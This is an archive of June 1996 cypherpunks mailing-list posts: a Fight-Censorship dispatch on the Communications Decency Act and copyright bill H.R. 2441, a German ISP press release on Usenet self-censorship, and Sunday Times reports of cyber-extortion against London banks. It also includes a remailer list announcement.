Bruce Taylor, the former Federal smut-buster and chief architect of
the CDA, is at it again. This time the Brucester is weighing in on the
New York CDA case with an expanded copy of the amicus brief he first
filed in the Philly lawsuit in which I'm a plaintiff.

When I spoke with him last Thursday, Taylor sketched out his latest
argument in favor of the CDA -- that it's constitutional because the
"finger" service can be modified to return info about whether
someone's an adult or a child. "I just learned about 'finger' a few
weeks ago," Taylor said.

His brief reads:

  Though the testimony is disputed between the parties, there is
  evidence in the record to show that there ways to comply with the
  CDA that are presently available, other means that are possible and
  trivial to institute, and there will undoubtedly be more and easier
  ways to comply in the future.  Potential mechanisms of compliance
  include... agreement on an -L18 or digital or access provider user
  or some other mechanism or combination of devices which allow
  content providers to identify adult visitors to their sites, pages,
  or GIFs and thereby exclude children (such as refinement of the
  PRESENT METHOD OF FINGERING to identify the name of a visitor so
  that the visitor's access provider or ISP releases the users age as
  well as his or her identity -- a fact no less anonymous),
                                               [Emphasis mine. --DBM]

Of course, Taylor's suggestion of putting an "A" or "C" (adult or
child) flag in the info returned by finger creates more problems than
it solves. Most online services don't provide information about users
via finger daemons. More to the point, such a proposal would let any
unscrupulous net.lurker troll for "C" flags -- not exactly the best
way to protect children!


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
          DIGITAL FUTURE COALITION ACTION ALERT, PRESS CONFERENCE
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

In response to a planned House subcommittee markup of its ill-bred
copyright legislation this Wednesday, the Digital Future Coalition is
planning a press conference at 9:30 am this Tuesday, June 11, at the
National Press Club in Washington, DC.

Presenters at the press conference include the Consumer Federation of
America, the National Education Association, the American Committee
for Interoperable Systems (including Sun Microsystems and America
Online), and the Home Recording Rights Coalition. Other members of the
DFC include the American Library Association, the Electronic Frontier
Foundation, People for the American Way, and the Electronic Privacy
Information Center.

-----------------------------------------------------------------------------

                   DIGITAL FUTURE COALITION ACTION ALERT
                            From dfc@alawash.org

      Imminent Congressional action on NII copyright bill threatens
             consumers, students, and other Internet users

Your immediate contacts with key House Judiciary Subcommittee Members
critical!

The House of Representatives Subcommittee on Courts and Intellectual
Property will meet in the next few days to vote on H.R. 2441, the NII
Copyright Protection Act. Call subcommittee members who represent you
or to your institution NOW and tell them that this badly imbalanced
bill shouldn't be voted on unless and until all of the following
problems are addressed. If passed in its current form, H.R. 2441
would:

  * Make it a crime to manufacture the next generation of VCRs,
    personal computers and other digital devices needed for
    recreational and educational use by adding a sweeping and
    overbroad new Section 1201 to the Copyright Act;

  * Make simply browsing the Internet a violation of the law without
    a license from copyright owners;

  * Prevent teachers from using computers to their full potential in
    "distance education" efforts that bring electronic classrooms to
     kids, especially in rural communities and for the disabled;

  * Subject computer system operators -- including online services
    and networks at schools and libraries -- to potentially crippling
    liability for the copyright violations of their users.

Please immediately fax a letter to -- AND CALL -- all members of the
House Judiciary Subcommittee on Courts and Intellectual Property who
represent you or an institution with which you are affiliated. These
contacts must be made NO LATER THAN Tuesday, June 11 and preferably
sooner. Address contacts to the Congressperson, but direct your letter
or call to the appropriate staffer. [URL at the end. -DBM]


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
         DEPUTY ATTY GENERAL SLAMS NET, CALLS FOR CENTRAL CONTROL
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

It's scaremongering at its finest. That's all I can think after I read
the text of a speech Deputy Attorney General Jamie Gorelick gave
earlier this year at the Air Force Academy.

Gorelick starts with the time-honored horror gambit of terrorists,
child pornographers, organized crime groups, and hackers -- but then
moves on to rail against the social problems she's found on the Net.
"Email flames" and "faceless" chat rooms are threats to family values,
she claims.

Then she calls for a centralized government agency to deal with the
problem of the Internet. Clearly, she says, we need a "Manhattan
Project" to fight cybernastiness and net.terrorists:

  We clearly need one focal point in the government to take the lead
  in addressing this issue comprehensively -- to develop national
  policy, coordinate the necessary other agencies, and with industry
  on developing solutions. We need the equivalent of the "Manhattan
  Project" to address the technological issues and to help us harden
  our infrastructures against attack. It might be that we can just
  designate an existing agency to take the lead. Or we may need a new
  agency or some interagency body to perform the task...

Jeanne Devoto (jdevoto@well.com) writes:

  [It's an] attempt to conflate the threat of computer intrusion with
  the "threat" of open access to a mass medium. If such a conflation
  is widely successful, we could see "We must pass this measure
  to license Internet users/ban indecent language/impose FCC
  regulation on ISPs - in order to combat the threat of computer
  crime!"

Computers are the equivalent of nuclear weapons? Maybe treating software
as a munition makes sense after all. 


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                AL GORE DECRIES "UNWARRANTED CENSORSHIP?"
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

Al Gore sure knows how to play to an audience -- even if it's a bunch
of computer geeks who don't like how the White House has embraced and
defended the Communications Decency Act. During his commencement
address at MIT on June 7, Gore said:

  But let me also state my clear and unequivocal view that a fear of
  chaos cannot justify unwarranted censorship of free speech, whether
  that speech occurs in newspapers, on the broadcast airwaves -- or
  over the Internet.

  Our best reaction to the speech we loathe is to speak out, to reject,
  to respond, even with emotion and fervor, but to censor -- no. That
  has not been our way for 200 years, and it must not become our way
  now.

Talk is cheap. It's now possible for Washington politicians to speak
out against the CDA -- but only because so many mainstream industry
and academic groups coalesced around the ALA/CIEC lawsuit.

When it counted, Gore did nothing to halt the morality crusaders who
pushed the "indecency" standard through Congress. In fact, he embraced
the bill, saying in an interview with the Wall Street Journal:

  This is an early Christmas for consumers. It's a terrific bill...
  Every concern the president expressed about the initial legislation
  has been dealt with on a bipartisan basis.

He also issued a statement on December 20, 1996:

  Today we had a victory for the American economy and the American
  consumer with the bipartisan agreement to create a telecommunications 
  industry for the 21st Century in a way that will lower prices,
  increase and improve services in telecommunications and preserve the
  diversity of voices and viewpoints in television and radio that are
  essential to our democracy.

Stay tuned for more reports.


-----------------------------------------------------------------------------

A clarification to Dispatch #12: Cherry v. Reno has not yet been
formally consolidated with Shea v. Reno.

Mentioned in this CDA update:

  Deputy Atty Gen Jamie Gorelick's speech slamming Net, calling for controls:
    http://fight-censorship.dementia.org/dl?num=2733
  Complete DFC copyright Action Alert, with legislator contact info:
    http://fight-censorship.dementia.org/dl?num=2740
  Declan McCullagh on "LolitaWatch" and -L18 -- July '96 Internet World:
    http://www.internetworld.com/iw-online/July96/news.html
  Declan McCullagh on CDA hearings -- June '96 Internet World:
    http://www.internetworld.com/iw-online/June96/news.html
  Bruce Taylor's amicus "finger" brief in NYC CDA lawsuit:
    http://fight-censorship.dementia.org/dl?num=2736
  NRC crypto report now online, thanks to John Young:
    http://pwp.usa.pipeline.com/~jya/nrcindex.htm
  Brock Meeks on Sen. Sam Nunn's plans for domestic snooping:
    http://www.hotwired.com/netizen/96/23/campaign_dispatch3a.html
  Al Gore speaks at MIT about dangers of net.censorship:
    http://fight-censorship.dementia.org/dl?num=2737
  Al Gore's 12/95 statement on Telecommunications Act of 1996:
    http://fight-censorship.dementia.org/dl?num=478
  Al Gore calls Telecommunications Act "early Christmas" present:
    http://fight-censorship.dementia.org/dl?num=469
  Al Gore speaks at Penn, greeted by anti-CDA protests:
    http://fight-censorship.dementia.org/dl?num=1170
  Creative Incentive Coalition on copyright, pro-HR2441:
    http://www.cic.org/
  Digital Future Coalition on copyright, anti-HR2441:
    http://www.ari.net/dfc/
  Brock Meeks on online copyright:
    http://www.hotwired.com/muckraker/96/20/index3a.html
  U.S. Congressional Internet Caucus:
    http://www.house.gov/white/internet_caucus/netcauc.html

  Fight-Censorship list   <http://fight-censorship.dementia.org/top/>
  Rimm ethics critique    <http://www.cs.cmu.edu/~declan/rimm/>
  Int'l Net-Censorship    <http://www.cs.cmu.edu/~declan/international/>
  Justice on Campus       <http://joc.mit.edu/>

This document and previous Fight-Censorship Dispatches are archived at:
  <http://fight-censorship.dementia.org/top/>

To subscribe to future Fight-Censorship Dispatches and related
announcements, send "subscribe fight-censorship-announce" in the body
of a message addressed to:
  majordomo@vorlon.mit.edu

Other relevant web sites:
  <http://www.vtw.org/>
  <http://www.epic.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>
  <http://www.ala.org/>
  <http://www.eff.org/>

-----------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 10 Jun 1996 14:48:25 +0800
To: cypherpunks@toad.com
Subject: Re: Report from Germany on "backdoor" net-censorship
Message-ID: <2.2.32.19960609235723.00b35b20@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>Criteria for the ICTF's proceed will be developed, evaluated and
>continuously updated by the Internet Medienrat. As an independant
>gremium, the Internet Medienrat tries to achieve a social consensus
>in the use of online media without government [sic! um] censorship.

Is that any relation to the Judenrat that ran the inside of the Ghettos and
Concentrated Camps during the late unpleasantness in Deutschland?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Mon, 10 Jun 1996 13:06:20 +0800
To: cypherpunks@toad.com
Subject: Gore opposes unwarranted'' Internet censorship
Message-ID: <9606100105.AA23760@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



        Sounds good but I had to laugh when I heard it... is he at odds with
other members of the administration, or is this rhetoric?

                              
>         CAMBRIDGE, Mass (Reuter) - Vice President Al Gore said  
>Friday society should not resort to ``unwarranted censorship'' 
>on the Internet as an overreaction to protect children from 
>objectionable material in cyperspace. 
>         In a commencement address at the Massachusetts Institute of  
>Technology, Gore said government had to assist parents in 
>protecting their children from exposure to such material. 
>         ``But let me also state my clear and unequivocal view that a  
>fear of chaos cannot justify unwarranted censorship of free 
>speech, whether that speech occurs in newspapers, on the 
>broadcast airwaves -- or over the Internet.'' 
>         ``Our best reaction to the speech we loathe is to speak out,  
>to reject, to respond, even with emotion and fervor, but to 
>censor -- no. That has not been our way for 200 years, and it 
>must not become our way now,'' he said. 
>         In February, President Clinton signed the Communications  
>Decency Act, which bans making indecent material available to 
>minors over computer networks. 
>         The American Civil Liberties Union and the American Library  
>Association have filed suit in a Philadelphia court challenging 
>the law as unconstitutional, saying it would stifle a broad 
>range of speech. 
>         In his address at the MIT, Gore stressed the gulf separating  
>society and science, a theme students had suggested in e-mail 
>messages to the vice president. He said new technologies 
>initially break down stable patterns and ``then new ones emerge 
>at a higher degree of complexity. 
>         ``Societies are vulnerable to misinterpreting the first  
>stage as a descent into chaos and then overreacting with the 
>imposition of a rigid, stagnating order,'' Gore told the 2,000 
>graduates in an outdoor ceremony. 
>                
>
>
_______________________
Regards,            Real generosity toward the future lies in giving 
                    all to the present. - Albert Camus
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 10 Jun 1996 14:05:36 +0800
To: reagle@MIT.EDU>
Subject: Re: Gore opposes unwarranted'' Internet censorship
In-Reply-To: <9606100105.AA23760@rpcp.mit.edu>
Message-ID: <Alirsxq00YUy0aELd7@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Jun-96 Gore opposes unwarranted''
.. by Joseph M. R. Jr.@MIT.EDU 
>         Sounds good but I had to laugh when I heard it... is he at odds with
> other members of the administration, or is this rhetoric?

Heh. It's rhetoric, but it's also a sign of the shift in political tides
in DC. Now it's possible for politicos to claim the CDA went a bit too
far -- but they waited for a broad, corporate, mainstream challenge to
the CDA and a negative reaction to the DoJ's arguments from the judges
before they felt comfy taking this position.

Jack Fields, chair of House telecom subcom, made similar mouthings last
month in a speech I reported on in this month's (or was it last month's)
Internet World.

Also check out my f-c dispatch #13 for background on Gore's stand.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 10 Jun 1996 14:07:07 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Anti-Scientologists
In-Reply-To: <199606091713.TAA18786@basement.replay.com>
Message-ID: <clirxai00YUyAaEOgJ@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Jun-96 Re: Anti-Scientologists by
Anonymous@REPLAY.COM 
> Truth #1: It is a religion
> Truth #2: It is no longer a cult, since the leader is dead.

Truth #1: It is indeed a religion. First Amendment advocates need to
tread carefully when dealing with the Church of Scientology, I believe.

Truth #2: Cults can exist in the absence of a charismatic leader. 

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 10 Jun 1996 15:30:48 +0800
To: cypherpunks@toad.com
Subject: More on LolitaWatch
Message-ID: <IlisQxa00YUy8aEFgk@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.internetworld.com/iw-online/July96/news.html
                  
     CDA Watch: DoJ Proposes Tagging Underage Users
       
     According to the press release, Nubility Inc. had released
     LolitaWatch, a network utility that detects "nubile young teens"
     online by checking for the federally mandated "age bit" in TCP/IP
     packets. But like the original novel, which parodied an older man's
     lust for a lascivious teen, LolitaWatch is a hoax, designed to
     illustrate the dangers of attaching age information to this
     workhorse Internet protocol.

     The proposal for an age bit is a serious one. Advanced during the
     Philadelphia court challenge to the Communications Decency Act
     (CDA), it's part of what American Library Association (ALA) attorney
     Bruce Ennis calls the Department of Justice's (DoJ's) "efforts to
     redefine the way the CDA is written."

[...]

     If the high court strikes down the CDA, Congress will try again. 
     Jack Fields (R-Texas), chair of the House telecommunications       
     subcommittee, said in May: "We should be ready with a         
     response--[pornography] is a real problem. I have a six-year old and
     I get concerned about that. I want a real solution that works. The
     CDA was driven by emotion and not by real policy."
     
     Forty years ago, media hype gave Lolita a reputation as an obscene
     novel and prompted the French, Argentine, and New Zealand           
     governments to censor it. But Vladimir Nabokov's work contained not
     one explicitly sexual passage. Without reading the book, customs
     agents never knew that it was a sad parody of an old man's fantasy
     lust for a young girl.

     The Net censors seem to have found in the Internet a modern      
     Lolita--which they understand just about as well as the 1950s   
     customs agents understood Nabokov.

     --Declan McCullagh







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 10 Jun 1996 18:12:48 +0800
To: Joel McNamara <cypherpunks@toad.com
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
Message-ID: <199606100605.XAA10885@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:43 PM 6/3/96 -0700, Joel McNamara wrote:
> (I'm sure the name "wizards" is trademarked by MS, so they won't be called
> that). 

You are free to use the word "wizard" provided that they look, feel,
and work much like what Microsoft calls a "wizard" -- see the 
Microsoft UI guidelines.  

This demand by Microsoft is pretty reasonable.  Now if it had been Apple
or lotus they probably would have declared that you could not write 
anything that looked, felt, or worked much like a wizard.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Mon, 10 Jun 1996 13:32:51 +0800
To: cypherpunks@toad.com
Subject: Re: Report from Germany on "backdoor" net-censorship
Message-ID: <m0uSrkU-0000AdC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


[German institutions' cancelling pornography, violence and Nazi
propaganda on Usenet will certainly have large international impact.
Thus I strongly suggest that you ask <summa@eco.de> for an official
translation.  I cannot guarantee for this rough translation to be
correct.  -- Ulf]

From:         summa@eco.de ("Harald A. Summa")

Press Release, June 5, 1996

Internet Media Counsil presents fist measurements for Voluntary
Self-Control

  [Voluntary Self-Control is the doublespeak term for censorship on
  pornography, violence, etc. It is, of course, not voluntary. um]

The leading Internet Serive Providers, on whose initiave the Internet
Medienrat, have deciced to found the Internet Content Task Force (ICTF)
for the purposes of Voluntary Self-Control. The ICTF will introduce
technical and organizational measurements to put up effective control
against contents harmful to minors and national-socialist propaganda
material. As a first step, the ICTF occupy itself with the News service,
and later with other forms of content transport in the Internet as
well.

The Internet Content Task Force will supply a news server specificially
configured for purposes of self-control at DE-CIX, the national data
exchange point of the Internet Service Providers. Proof of origin of
critical articles will be processed by the server, archived in a data
base observing privacy laws, and stored at a central facility.
Furthermore, sample news articles will be suject to detailed legal
evaluation. Should this result in suspicion or proof of transportation
of illegal contents, the ICTF can launch various steps to work against
propagation of these contents. For example, it can arrange for
blocking of complete newsgroups or retrospect "Cancel" of articles
already transmitted. ICTF can direct possible criminal investigation
with help of its data base.

Criteria for the ICTF's proceed will be developed, evaluated and
continuously updated by the Internet Medienrat. As an independant
gremium, the Internet Medienrat tries to achieve a social consensus
in the use of online media without government [sic! um] censorship.
The formation of the Internet Medienrat, which is currently preparing
its working basis, is being pushed ahead by Prof. Goetze, COE of
Springer Verlag Heidelberg, and eco Electronic Commerce Forum e.V.
It will present its members and organization to the public on
September 19, 1996.

>From govenment side, the Internet Medienrat is supported by the
Federal Ministry of Economy. Min. of Economy Rexroth: "I appreciate
the German online industry's initiative to found an Internet Media
Counsil as a gremium of Voluntary Self-Control."


Background Information on the Internet Content Task Force (ICTF)

The problem of protection of minors and of spreading
national-socialist ideas in the new media - especially on the Internet
- is currently being discussed intensively and controversially.
Meanwhile, politics and investigation authorities have begun to
proceed against the distribution of illegal contents the the Internet.
In the past weeks, the press has been reporting intensively about
investigations against large service providers.

However, the current legal situation gives few starting points for
coordinated proceeding. Lawyers cannot even agree on who can and
should be punished for distributing contents relevant to criminal
law on the Internet. Depending on standpoint and interests, even
noted criminal lawyers hold different views. Some do not consider
distribution of pornography and national-socialist writings in
electronic form punishable at all, others even want to hold service
providers responsible for mere transportation of data. Mediating
opionions imply that only the author of the message be punishable.
The only strong fact in the complete discussion is that the matter
-- as always in difficult dogmatic questions in penal law -- will
finally be decided by courts. It is also a fact that the true
authors of illegal messages -- especially those with an especially
high criminal energy -- can be determined only with great difficulty,
so that the threat of punishment insofar is void.

The solution to this problem is being complicated by the continuing
political discussion and superposed by other question complexes.
For example, the states regard new media as an extension of their
traditional radio regulation competence. They are trying to ensure
future influence by an extensive interpretation of the constitutional
regulation of competences and the laws and state treaties based on it.
The draft State Treaty on Media Services that applies to the whole
field of Internet and online services is one result of these
reasonings. To create facts in this field, the state treaty shall
be passed soon.

Lead by the "Future" Ministry, the federation is also working on
legal framework for new information and communication services to
comprehensively cover the subject. The Ministry of Interior on its
side is concerned with restricting Freedom of Communication with
priority. This activity has already resulted in the novel Wiretap
Law and the Telecommunication Surveillance Decree. Further laws,
especially a ban on crytography, are planned. On the European level,
a working group initiated on the last G7 conference, is trying to
achive international consesus.

Legal clarification, which is strictly needed but with still open
result, is faced by fear of censorship and too wide-reaching
government interference.

Since a long time, the leading German Internet Service Providers have
been trying to solve the now openly visible conflict betreen the
"Information Police State" and the "Anarchy in the Net" as feared by
politics. Thus they have propagated founding a Voluntary Self-Control
and initiated the formation of an Internet Medienrat. As a further
buiding stone, the Internet Content Task Force (ICTF) is now being
put to existence.

This shall also work against the impression that the main purpose of
the Internet were distributiong extremist and pornographic contents.
At least this was the result of numerous -- often badly researched --
reports in the recent weeks. They did neither differenciate between
the Internet services (Mail, News, WWW, Chat and others), nor present
the relation of doubtlessly useful and the less desired contents.
ICTF now turns towards the problem in a much more refined way. There,
it first will occupy itself with the currently probably most critcal
part of the Internet, the so-called News service.

The special problem of the News service is that information can be
distributed world-wide, yet anonymously. This is different of at least
fundamentally more difficult in other parts of the Internet, so that
the volume of critical content in the News is comparably high. The
ICTF will register the information availible on the origin of news
and store them in a data base as to make it possible to determine
who has sent an article or disguised the real author's identity, in
retrospect. The data base will be kept observing privavy laws and
third parties' protection-deserving interests [the Privacy Law puts
limits on databases with "protection-deserving" personal
information, um]. To avoid abuse, the data will regularly be exported
to hard storage and deposited with an attorney.

Furthermore, the existing or newly created newsgroups will be
classified, so that groups serving to distribute exclusively or
predominantly illegal contents can be excluded from further
distribution. Sample investigation of articles and analysis of
articles as necessary will also make it possible to limit the
transportation of individual articles.

Founding the ICTF, the Internet Service Providers accept part of the
responsibility in forming a modern information society. It is clear
that preventive action on a national level cannot stop illegal action
on a global level. Thus, the ICTF is a model for similar initiatives
in other countries, and is to be seen as an appeal to politics to
make their contribution to solving the problem. Currently, the ICTF
is the only perceptible approach to respect the need for "Law and
Order" and yet leaves the new medium Internet with the freedom needed
for futher prosperation.

On the other hand, national legislator's attempts to solve the problem
on its own will hardly solve the problem, but put severe damage to
the economic site Germany. For one thing is clear in the virtual
worlds of communication networks: Borders lose their importance, and
location is no longer an issue. There is nothing to prevent an
enterprise from moving its online activities to a country with less
bureaucrary and legal restrictions. First tendencies for migration
are already percepted.

The Internet Content Task Force is supported be the following Internet
Service Providers:

CERFnet GmbH, Heidenrod
ECRC GmbH, Muenchen,
EUnet Deutschland GmbH, 
GTN GmbH, Krefeld,
ipf.net GmbH, Frankfurt,
IS/Thyssen  Internet Service GmbH,  Hamburg,
Point of Presence, Hamburg, 
nacamar GmbH, Dreieich,
NTG-X/link GmbH, Karlsruhe,
roka GmbH, Duisburg,
seicom GmbH, Pfullingen,
spacenet GmbH, Muenchen.

Further information can be obtained from:

eco Electronic Commerce Forum e. V.
c/o Harald A. Summa
Schaeferkampstr. 19

44287 Dortmund
Tel:	+49 (0) 231 44 79 49
Fax:	+49 (0) 231 44 81 35
E-Mail: summa@eco.de
http://www.eco.de/

or

attorney at law
RA Michael Schneider
Dickstr. 35
53773 Hennef / Sieg, 
Tel:	+49 (0) 2242 9270-0 
Fax: 	+49 (0) 2242 9270-99                     
E-Mail: Michael.Schneider@Anwalt.DE
http://www.anwalt.de/


+++
eco - Electronic Commerce Forum e. V.

c/o Harald A. Summa
Schäferkampstr. 19
44287 Dortmund

Tel 0231 / 44 79 49
Fax 0231 / 44 81 35
Email info@eco.de
+++




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 10 Jun 1996 14:33:26 +0800
To: cypherpunks@toad.com
Subject: TST on Cyber Terror Inquiry
Message-ID: <199606100036.AAA24146@pipe3.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The article Winn Schwartau cited today and a related column: 
 
---------- 
 
   The Sunday Times (London), June 9, 1996, p. 1/8 
 
 
   Secret DTI inquiry into cyber terror [Insight Column] 
 
 
   The government has been holding a secret investigation into 
   attacks by "cyber terrorists" on the City of London for 
   more than two years. The Department of Trade and Industry 
   (DTI), Bank of England, GCHQ, the secret listening station, 
   and the Defence Research Agency (DRA) are involved in the 
   inquiry. 
 
   The existence of the investigation, which began in April 
   1994, emerged after The Sunday Times revealed last week 
   that banks, broking firms and investment houses had paid 
   millions of pounds to gangs that threaten to wipe out 
   computer systems. 
 
   Correspondence from the investigating authorities, seen by 
   Insight, include letters from civil servants saying they 
   are "extremely concerned" at the evidence of extortion 
   demands. 
 
   Yesterday the DTI issued a statement confirming the inquiry 
   and suggesting its work had been hampered by the lack of 
   co-operation from City institutions. 
 
   "We are very interested in the allegations of extortion 
   directed at City of London institutions which were brought 
   to our attention in 1994. We responded then by involving 
   many government organisations, including the DTI, the 
   police, the Bank of England and other agencies. So far, we 
   have not been presented with any hard evidence from 
   victims. We would urge those threatened to come forward," 
   a spokesman said. 
 
   In one letter, dated May 1995, David Hendon, director of 
   DTI technical affairs, wrote to a company specialising in 
   computer security work stating that he was taking the City 
   extortion issue "extremely seriously". Insight has since 
   seen the evidence passed to the DTI and GCHQ which sparked 
   the investigation. In 1994, a consultant working for a 
   company which undertakes computer risk assessments for City 
   institutions compiled a table of 46 attacks on banks and 
   finance houses in New York, London and other centres, 
   starting in January 1993. 
 
   The list included details of raids on three British banks 
   and one American investment house. The documents suggested 
   that operations in the futures markets had been a focus for 
   some of the attacks. 
 
   Documents sent by the DRA, from the office of Professor 
   David Parks, a senior director, indicate that the agency is 
   especially interested in the "weaponry" deployed by the 
   cyber terrorists. 
 
   The agency believes high-intensity radio frequency (HIRF) 
   guns may have been used to black out trading positions in 
   City finance houses. The weapon disables a computer by 
   firing electromagnetic radiation at it and is a "black 
   programme" at the defence ministry, one of the highest 
   security classification levels. 
 
   Last December, Parks approached a company which specialises 
   in defensive measures against information warfare and 
   carries out work for GCHQ. For a L30,000 fee it was asked 
   to arrange a demonstration of a portable HIRF weapon in 
   Germany. 
 
   Details of the HIRF weaponry and its use in the City have 
   also been compiled by Computing magazine, which intends to 
   pass them to the DTI and other authorities. 
 
   [End] 
 
---------- 
 
   [Related column, p. 2/4] 
 
   Held to ransom by superhighway-men 
 
   Private Account [Column] 
 
   By Jeff Randall 
 
 
   Forget Butch Cassidy and the Sundance Kid, the world's 
   financial institutions have a new type of bank robber to 
   deal with -- the cyber terrorist. 
 
   Before you start thinking it sounds like science fiction, 
   consider this: the Department of Trade and Industry (DTI) 
   this weekend confirmed there is an official investigation 
   into "raids" by gangs of computer experts who threaten to 
   wipe out electronic information and trading systems, unless 
   they are paid off. 
 
   The DTI spoke out after last weekend's scoop by the Sunday 
   Times' Insight team revealing that some of London's best- 
   known institutions have paid huge ransoms to "electronic 
   highwaymen" to prevent the meltdown of computer networks. 
   These revelations have sent a shiver up the spines of the 
   City's top banks. Financiers are terrified the emergence of 
   a gaping hole in their systems will cause a loss of 
   investor and customer confidence -- and rightly so. 
 
   Can you imagine calling your stockbroker to buy a few 
   thousand ICI shares, only to be told its entire information 
   bank had been blown away by a Dick Turpin with a PhD in 
   electronic engineering? 
 
   If, like me, you know nothing about computer technology, 
   and care even less, the temptation is to dismiss the 
   problem as the creation of Arthur C Clarke. But the DTI has 
   acknowledged for the first time that an investigation into 
   these "attacks" has been under way for two years. The Bank 
   of England and GCHQ, the government's secret listening 
   station, are working alongside the DTI in the inquiry. 
 
   Agencies in Britain and America believe there have been 
   more than 40 raids on investment firms in New York, London 
   and other European financial centres since 1993. Victims 
   are understood to have paid up to L13m a time after 
   blackmailers showed their ability to bring electronic 
   trading in shares, bonds and commodities to a halt. 
   Futures-market systems have been a favoured target of the 
   space-age bandits. In some cases, the blackmailers have 
   used technology developed by military scientists. 
 
   But here is the paradox: the DTI has been hampered by the 
   reluctance of City firms involved to co-operate. 
   Extortionists have so frightened the investment houses, 
   they fear reprisals if they are discovered helping official 
   agencies track down the gangs. There is also concern that 
   an admission of the threats would diminish confidence in 
   the banking system and create a loss of face for the 
   victims. A banker told Insight: "You will never get a 
   financial institution to admit it has an extortion policy, 
   let alone that it has paid money." 
 
   That begs the question: who in London has paid up? Insight 
   has been told of at least four blue-chip firms caving in to 
   extortionists. For the time being, we have agreed to keep 
   certain information confidential to preserve the integrity 
   of the institutions while the agencies investigate. But the 
   names will eventually surface, and then there will be some 
   serious explaining to do. 
 
   [End] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 10 Jun 1996 21:45:24 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Electronic Signature Act Of 1996
Message-ID: <2.2.16.19960610095811.1d4f15ba@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:24 PM 6/5/96 -0400, Black Unicorn wrote:

>Please remember that the UCC's application is generally restricted to the 
>sales of goods or acts between merchants.

I'll "remember" this only insofar as it reminds me to read your other
messages with a more skeptical eye. I hope you pay more attention to
accuracy when you're at work.

--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Mon, 10 Jun 1996 22:50:59 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@myriad.alias.net
Subject: New Type2.list/Pubring.mix
Message-ID: <Pine.NEB.3.93.960610053918.12087A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I've created a new type2.list/pubring.mix combination on
jpunix.com. The most notable change is that the q@c2.org has been removed
from the list. After several spot checks over the weekend I noticed the
ncognito remailer producing sporadic pings so I left it on the list. Also,
please note that the middleman remailer has changed nym servers from
alpha.c2.org to nym.jpunix.com. 

	The files are available by WWW at http://www.jpunix.com as well as
by anonymous FTP at ftp.jpunix.com.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbv9H1OTpEThrthvAQEyewQAqHY5duExLgUQBSf/EQOshXCevQReOKY4
LyVJ4GODBY626OxSUNvi+9+mlJs/0oW2tQ0iSuz3EeEBLrZw0m02wsCPtyGgojd+
